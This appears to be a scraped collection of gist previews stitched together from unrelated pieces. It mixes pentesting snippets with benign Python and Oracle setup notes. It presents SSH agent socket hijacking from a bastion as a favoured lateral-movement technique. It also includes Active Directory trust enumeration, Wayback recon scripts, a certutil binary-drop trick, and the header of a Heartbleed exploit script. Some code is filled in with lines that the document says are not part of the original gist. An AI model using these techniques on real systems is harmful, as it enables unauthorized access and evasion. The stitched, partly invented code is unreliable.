Here's one of my favorite techniques for lateral movement: SSH agent forwarding. Use a UNIX-domain socket to advance your presence on the network. No need for passwords or keys.

root@bastion:~# find /tmp/ssh-* -type s
/tmp/ssh-srQ6Q5UpOL/agent.1460

root@bastion:~# SSH_AUTH_SOCK=/tmp/ssh-srQ6Q5UpOL/agent.1460 ssh [email protected]

user@internal:~$ hostname -f
internal.company.tld
@w00tc
w00tc / 1) Active Directory One Liners
Last active August 19, 2024 22:56
Some Pentesting Notes
Retrieves all of the trust relationships for this domain (does not grab forest trusts)
([System.DirectoryServices.ActiveDirectory.Domain]::GetCurrentDomain()).GetAllTrustRelationships()
Grab Forest Trusts.
([System.DirectoryServices.ActiveDirectory.Forest]::GetCurrentForest()).GetAllTrustRelationships()
import requests
import sys
import json

def waybackurls(host, with_subs):
    # Query the Wayback Machine CDX index for every archived URL under the host
    # (optionally including subdomains), collapsing duplicates by URL key.
    if with_subs:
        url = 'http://web.archive.org/cdx/search/cdx?url=*.%s/*&output=json&fl=original&collapse=urlkey' % host
    else:
        url = 'http://web.archive.org/cdx/search/cdx?url=%s/*&output=json&fl=original&collapse=urlkey' % host
    # The lines below complete the truncated preview and are not part of the gist as shown:
    # with output=json the first row of the response is the field header, so skip it.
    r = requests.get(url)
    results = r.json()
    return [row[0] for row in results[1:]] if results else []
import requests
import re
import sys
from multiprocessing.dummy import Pool

def robots(host):
    # Fetch every distinct archived copy of the host's robots.txt that returned 200,
    # as (timestamp, original URL) rows from the CDX index.
    r = requests.get(
        'https://web.archive.org/cdx/search/cdx\
?url=%s/robots.txt&output=json&fl=timestamp,original&filter=statuscode:200&collapse=digest' % host)
    # The return below completes the truncated preview and is not part of the gist as shown.
    return r.json()
@mattifestation
mattifestation / drop_binary.bat
Created July 12, 2015 05:49
Drop binary data from the command line w/o needing PowerShell
echo -----BEGIN CERTIFICATE----- > encoded.txt
echo Just Base64 encode your binary data
echo TVoAAA== >> encoded.txt
echo -----END CERTIFICATE----- >> encoded.txt
certutil -decode encoded.txt decoded.bin
@eelsivart
eelsivart / heartbleed.py
Last active December 14, 2024 16:35 — forked from sh1n0b1/ssltest.py
Heartbleed (CVE-2014-0160) Test & Exploit Python Script
#!/usr/bin/python
# Modified by Travis Lee
# Last Updated: 4/21/14
# Version 1.16
#
# -changed output to display text only instead of hexdump and made it easier to read
# -added option to specify number of times to connect to server (to get more data)
# -added option to send STARTTLS command for use with SMTP/POP/IMAP/FTP/etc...
# -added option to specify an input file of multiple hosts, line delimited, with or without a port specified (host:port)
@kimus
kimus / cx_oracle.md
Last active September 2, 2024 18:28
Installing python cx_oracle on Ubuntu

First of all, it just seems like doing anything with Oracle is obnoxiously painful for no good reason. It's the nature of the beast I suppose. cx_oracle is a python module that allows you to connect to an Oracle Database and issue queries, inserts, updates... the usual jazz.

Linux

Step 1:

sudo apt-get install build-essential unzip python-dev libaio-dev

Step 2. Click here to download the appropriate zip files required for this. You'll need:

@bradmontgomery
bradmontgomery / louie-blurred.jpg
Created July 16, 2012 21:18
A very gentle introduction to PIL
@pklaus
pklaus / enumerate_interfaces.py
Last active October 1, 2024 19:51
Python: List all Network Interfaces On Computer
"""
Determine IPv4 addresses on a Linux machine via the socket interface.
Thanks @bubthegreat for the changes to make it Py2/3 compatible and the helpful
code comments: https://gist.github.com/pklaus/289646#gistcomment-2396272
This version has all comments removed for brevity.
"""
import socket
import array
import struct